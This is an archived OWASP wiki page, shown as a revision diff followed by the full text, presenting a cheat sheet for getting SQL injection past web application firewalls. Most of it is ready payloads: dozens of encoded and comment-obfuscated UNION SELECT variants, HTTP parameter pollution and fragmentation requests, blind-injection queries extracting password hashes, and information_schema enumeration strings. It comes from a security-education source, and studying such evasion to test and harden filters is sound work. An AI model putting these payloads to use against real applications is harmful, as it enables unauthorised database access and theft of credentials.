This site is the archived OWASP Foundation Wiki and is no longer accepting Account Requests.
To view the new OWASP Foundation website, please visit https://owasp.org

Difference between revisions of "SQL Injection Bypassing WAF"

From OWASP
Jump to: navigation, search
m (OWASP SQLi WAF ByPassing)
m (OWASP SQLi WAF ByPassing)
Line 180: Line 180:
 
<br>
 
<br>
  
/*!%55NiOn*/ /*!%53eLEct*/<br>
+
  /*!%55NiOn*/ /*!%53eLEct*/<br>
%55nion(%53elect 1,2,3)-- -<br>
+
  %55nion(%53elect 1,2,3)-- -<br>
+union+distinct+select+<br>
+
  +union+distinct+select+<br>
+union+distinctROW+select+<br>
+
  +union+distinctROW+select+<br>
/**//*!12345UNION SELECT*//**/<br>
+
  /**//*!12345UNION SELECT*//**/<br>
/**//*!50000UNION SELECT*//**/<br>
+
  /**//*!50000UNION SELECT*//**/<br>
/**/UNION/**//*!50000SELECT*//**/<br>
+
  /**/UNION/**//*!50000SELECT*//**/<br>
/*!50000UniON SeLeCt*/<br>
+
  /*!50000UniON SeLeCt*/<br>
union /*!50000%53elect*/<br>
+
  union /*!50000%53elect*/<br>
+#uNiOn+#sEleCt<br>
+
  +#uNiOn+#sEleCt<br>
+#1q%0AuNiOn all#qa%0A#%0AsEleCt<br>
+
  +#1q%0AuNiOn all#qa%0A#%0AsEleCt<br>
/*!%55NiOn*/ /*!%53eLEct*/<br>
+
  /*!%55NiOn*/ /*!%53eLEct*/<br>
/*!u%6eion*/ /*!se%6cect*/<br>
+
  /*!u%6eion*/ /*!se%6cect*/<br>
+un/**/ion+se/**/lect<br>
+
  +un/**/ion+se/**/lect<br>
uni%0bon+se%0blect<br>
+
  uni%0bon+se%0blect<br>
%2f**%2funion%2f**%2fselect<br>
+
  %2f**%2funion%2f**%2fselect<br>
union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A<br>
+
  union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A<br>
REVERSE(noinu)+REVERSE(tceles)<br>
+
  REVERSE(noinu)+REVERSE(tceles)<br>
/*--*/union/*--*/select/*--*/<br>
+
  /*--*/union/*--*/select/*--*/<br>
union (/*!/**/ SeleCT */ 1,2,3)<br>
+
  union (/*!/**/ SeleCT */ 1,2,3)<br>
/*!union*/+/*!select*/<br>
+
  /*!union*/+/*!select*/<br>
union+/*!select*/<br>
+
  union+/*!select*/<br>
/**/union/**/select/**/<br>
+
  /**/union/**/select/**/<br>
/**/uNIon/**/sEleCt/**/<br>
+
  /**/uNIon/**/sEleCt/**/<br>
/**//*!union*//**//*!select*//**/<br>
+
  /**//*!union*//**//*!select*//**/<br>
/*!uNIOn*/ /*!SelECt*/<br>
+
  /*!uNIOn*/ /*!SelECt*/<br>
+union+distinct+select+<br>
+
  +union+distinct+select+<br>
+union+distinctROW+select+
+
  +union+distinctROW+select+<br>
 +
  +UnIOn%0d%0aSeleCt%0d%0a<br>
 +
  UNION/*&test=1*/SELECT/*&pwn=2*/<br>
 +
  un?+un/**/ion+se/**/lect+<br>
 +
  +UNunionION+SEselectLECT+<br>
 +
  +uni%0bon+se%0blect+<br>
 +
  %252f%252a*/union%252f%252a /select%252f%252a*/<br>
 +
  /%2A%2A/union/%2A%2A/select/%2A%2A/<br>
 +
  %2f**%2funion%2f**%2fselect%2f**%2f<br>
 +
  union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A<br>
 +
  /*!UnIoN*/SeLecT+
 +
'''Union Select  by PASS with Url Encoded Method:'''
 
<br>
 
<br>
 +
    %55nion(%53elect)<br>
 +
    union%20distinct%20select<br>
 +
    union%20%64istinctRO%57%20select<br>
 +
    union%2053elect<br>
 +
    %23?%0auion%20?%23?%0aselect<br>
 +
    %23?zen?%0Aunion all%23zen%0A%23Zen%0Aselect<br>
 +
    %55nion %53eLEct<br>
 +
    u%6eion se%6cect<br>
 +
    unio%6e %73elect<br>
 +
    unio%6e%20%64istinc%74%20%73elect<br>
 +
    uni%6fn distinct%52OW s%65lect<br>
 +
    %75%6e%6f%69%6e %61%6c%6c %73%65%6c%65%63%7<br>
 +
'''Illegal mix of Collations ByPass Method :'''
 +
<br>
 +
    unhex(hex(Concat(Column_Name,0x3e,Table_schema,0x3e,table_Name)))
 +
    /*!from*/information_schema.columns/*!where*/column_name%20/*!like*/char(37,%20112,%2097,%20115,%20115,%2037)
 +
 +
 +
    union select 1,2,unhex(hex(Concat(Column_Name,0x3e,Table_schema,0x3e,table_Name))),4,5 /*!from*/information_schema.columns/*!where*/column_name%20/*!like*/char(37,%20112,%2097,%20115,%20115,%2037)?
 +
 
<hr>
 
<hr>
''If you have any SQLi Quires which is Missed above Please help to Contribute [https://www.owasp.org/index.php/Talk:DhirajMishra Mail Down] and Be a Part of SQLi Contributor.''
+
''If you have any SQLi Quires which is Missed above Please help to Contribute [https://www.owasp.org/index.php/Dhiraj_Mishra Mail Down] and be a part of '''The Popular SQLi Evasion CheatSheet.'''''
  
 
== Contributor ==
 
== Contributor ==

Revision as of 16:26, 7 August 2016

Cheatsheets-header.jpg

Last revision (mm/dd/yy): 08/7/2016

SQLi

A SQL injection attack consists of insertion or "injection" of a SQL query via the input data from the client to the application. A successful SQL injection exploit can read sensitive data from the database, modify database data (Insert/Update/Delete), execute administration operations on the database (such as shutdown the DBMS), recover the content of a given file present on the DBMS file system and in some cases issue commands to the operating system. SQL injection attacks are a type of injection attack, in which SQL commands are injected into data-plane input in order to effect the execution of predefined SQL commands.

SQL Injection – Basic Concepts

There are two types of SQL Injection

• SQL Injection into a String/Char parameter
  Example: SELECT * from table where example = 'Example'

• SQL Injection into a Numeric parameter
  Example: SELECT * from table where id = 123
  1. Exploitation of SQL Injection vulnerabilities is divided into classes according to the DBMS type and injection conditions.
• A vulnerable request can get into Insert, Update, Delete, etc.
  Example: UPDATE users SET pass = '1' where user = 't1' OR 1=1--'
  1. Blind SQL Injection
  Example: select * from table where id = 1 AND if((ascii(lower(substring((select user()),$i,1))))!=$s,1,benchmark(200000,md5(now())))
  1. Exploitation features for various DBMSs
  Example: (MySQL): SELECT * from table where id = 1 union select 1,2,3
  Example: (PostgreSQL): SELECT * from table where id = 1; select 1,2,3

Bypassing WAF: SQL Injection - Normalization Method
Example Number (1) of a vulnerability in the function of request Normalization.
• The following request doesn’t allow anyone to conduct an attack

 /?id=1+union+select+1,2,3/*

• If there is a corresponding vulnerability in the WAF, this request

 will be successfully performed
 /?id=1/*union*/union/*select*/select+1,2,3/*

• After being processed by WAF, the request will become

 index.php?id=1/*uni X on*/union/*sel X ect*/select+1,2,3/*

The given example works in case of cleaning of dangerous traffic, not in case of blocking the entire request or the attack source.

Example Number (2) of a vulnerability in the function of request Normalization.
• Similarly, the following request doesn’t allow anyone to conduct an attack

 /?id=1+union+select+1,2,3/*

• If there is a corresponding vulnerability in the WAF, this request will be successfully performed

 /?id=1+un/**/ion+sel/**/ect+1,2,3--

• The SQL request will become

 SELECT * from table where id =1 union select 1,2,3--

Instead of construction /**/, any symbol sequence that WAF cuts off can be used (e.g., #####, %00).

The given example works in case of excessive cleaning of incoming data (replacement of a regular expression with the empty string).

'Using HTTP Parameter Pollution (HPP)'

• The following request doesn’t allow anyone to conduct an attack

 /?id=1;select+1,2,3+from+users+where+id=1--

• This request will be successfully performed using HPP

 /?id=1;select+1&id=2,3+from+users+where+id=1--

Successful conduction of an HPP attack bypassing WAF depends on the environment of the application being attacked.
OWASP EU09 Luca Carettoni, Stefano diPaola.

Sqli-HPP.png

Using HTTP Parameter Pollution (HPP)

• Vulnerable code

 SQL=" select key from table where id= "+Request.QueryString("id")

• This request is successfully performed using the HPP technique

 /?id=1/**/union/*&id=*/select/*&id=*/pwd/*&id=*/from/*&id=*/users

• The SQL request becomes select key from table where

 id=1/**/union/*,*/select/*,*/pwd/*,*/from/*,*/users

ByPassing WAF: SQL Injection – HPF
Using HTTP Parameter Fragmentation (HPF)

• Vulnerable code example

 Query("select * from table where a=".$_GET['a']." and b=".$_GET['b']);
 Query("select * from table where a=".$_GET['a']." and b=".$_GET['b']." limit".$_GET['c']);

• The following request doesn’t allow anyone to conduct an attack

 /?a=1+union+select+1,2/*

• These requests may be successfully performed using HPF

 /?a=1+union/*&b=*/select+1,2
 /?a=1+union/*&b=*/select+1,pass/*&c=*/from+users--

• The SQL requests become

 select * from table where a=1 union/* and b=*/select 1,2
 select * from table where a=1 union/* and b=*/select 1,pass/* limit */from users--

Bypassing WAF: Blind SQL Injection
Using logical requests AND/OR
• The following requests allow one to conduct a successful attack for many WAFs

 /?id=1+OR+0x50=0x50
 /?id=1+and+ascii(lower(mid((select+pwd+from+users+limit+1,1),1,1)))=74

Negation and inequality signs (!=, <>, <, >) can be used instead of the equality one – It is amazing, but many WAFs miss it!

It becomes possible to exploit the vulnerability with the method of blind-SQL Injection by replacing SQL functions that get to WAF signatures with their synonyms.
substring() -> mid(), substr()
ascii() -> hex(), bin()
benchmark() -> sleep()

Wide variety of logical requests.
and 1
or 1
and 1=1
and 2<3
and 'a'='a'
and 'a'<>'b'
and char(32)=' '
and 3<=2
and 5<=>4
and 5<=>5
and 5 is null
or 5 is not null
....
An example of various request notations with the same meaning.
select user from mysql.user where user = 'user' OR mid(password,1,1)='*'
select user from mysql.user where user = 'user' OR mid(password,1,1)=0x2a
select user from mysql.user where user = 'user' OR mid(password,1,1)=unhex('2a')
select user from mysql.user where user = 'user' OR mid(password,1,1) regexp '[*]'
select user from mysql.user where user = 'user' OR mid(password,1,1) like '*'
select user from mysql.user where user = 'user' OR mid(password,1,1) rlike '[*]'
select user from mysql.user where user = 'user' OR ord(mid(password,1,1))=42
select user from mysql.user where user = 'user' OR ascii(mid(password,1,1))=42
select user from mysql.user where user = 'user' OR find_in_set('2a',hex(mid(password,1,1)))=1
select user from mysql.user where user = 'user' OR position(0x2a in password)=1
select user from mysql.user where user = 'user' OR locate(0x2a,password)=1
Known:
substring((select 'password'),1,1) = 0x70
substr((select 'password'),1,1) = 0x70
mid((select 'password'),1,1) = 0x70
New:
strcmp(left('password',1), 0x69) = 1
strcmp(left('password',1), 0x70) = 0
strcmp(left('password',1), 0x71) = -1
STRCMP(expr1,expr2) returns 0 if the strings are the same, -1 if the first , argument is smaller than the second one, and 1 otherwise.

An example of signature bypass.
The following request gets to WAF signature

/?id=1+union+(select+1,2+from+users)

But sometimes, the signatures used can be bypassed

/?id=1+union+(select+'xz'from+xxx)
/?id=(1)union(select(1),mid(hash,1,32)from(users))
/?id=1+union+(select'1',concat(login,hash)from+users)
/?id=(1)union(((((((select(1),hex(hash)from(users))))))))
/?id=(1)or(0x50=0x50)


An SQL Injection attack can successfully bypass the WAF , and be conducted in all following cases:
• Vulnerabilities in the functions of WAF request normalization.
• Application of HPP and HPF techniques.
• Bypassing filter rules (signatures).
• Vulnerability exploitation by the method of blind SQL Injection.
• Attacking the application operating logics (and/or)

WAF Bypassing Methods.

 /*!%55NiOn*/ /*!%53eLEct*/
 %55nion(%53elect 1,2,3)-- -
+union+distinct+select+
+union+distinctROW+select+
/**//*!12345UNION SELECT*//**/
/**//*!50000UNION SELECT*//**/
/**/UNION/**//*!50000SELECT*//**/
/*!50000UniON SeLeCt*/
union /*!50000%53elect*/
+#uNiOn+#sEleCt
+#1q%0AuNiOn all#qa%0A#%0AsEleCt
/*!%55NiOn*/ /*!%53eLEct*/
/*!u%6eion*/ /*!se%6cect*/
+un/**/ion+se/**/lect
uni%0bon+se%0blect
 %2f**%2funion%2f**%2fselect
union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A
REVERSE(noinu)+REVERSE(tceles)
/*--*/union/*--*/select/*--*/
union (/*!/**/ SeleCT */ 1,2,3)
/*!union*/+/*!select*/
union+/*!select*/
/**/union/**/select/**/
/**/uNIon/**/sEleCt/**/
/**//*!union*//**//*!select*//**/
/*!uNIOn*/ /*!SelECt*/
+union+distinct+select+
+union+distinctROW+select+
+UnIOn%0d%0aSeleCt%0d%0a
UNION/*&test=1*/SELECT/*&pwn=2*/
un?+un/**/ion+se/**/lect+
+UNunionION+SEselectLECT+
+uni%0bon+se%0blect+
 %252f%252a*/union%252f%252a /select%252f%252a*/
/%2A%2A/union/%2A%2A/select/%2A%2A/
 %2f**%2funion%2f**%2fselect%2f**%2f
union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A
/*!UnIoN*/SeLecT+

Union Select by PASS with Url Encoded Method:

   %55nion(%53elect)
union%20distinct%20select
union%20%64istinctRO%57%20select
union%2053elect
 %23?%0auion%20?%23?%0aselect
 %23?zen?%0Aunion all%23zen%0A%23Zen%0Aselect
 %55nion %53eLEct
u%6eion se%6cect
unio%6e %73elect
unio%6e%20%64istinc%74%20%73elect
uni%6fn distinct%52OW s%65lect
 %75%6e%6f%69%6e %61%6c%6c %73%65%6c%65%63%7

Illegal mix of Collations ByPass Method :

   unhex(hex(Concat(Column_Name,0x3e,Table_schema,0x3e,table_Name)))
   /*!from*/information_schema.columns/*!where*/column_name%20/*!like*/char(37,%20112,%2097,%20115,%20115,%2037)


   union select 1,2,unhex(hex(Concat(Column_Name,0x3e,Table_schema,0x3e,table_Name))),4,5 /*!from*/information_schema.columns/*!where*/column_name%20/*!like*/char(37,%20112,%2097,%20115,%20115,%2037)?

If you have any SQLi Quires which is Missed above Please help to Contribute Mail Down and be a part of The Popular SQLi Evasion CheatSheet.

Contributor

<insert/>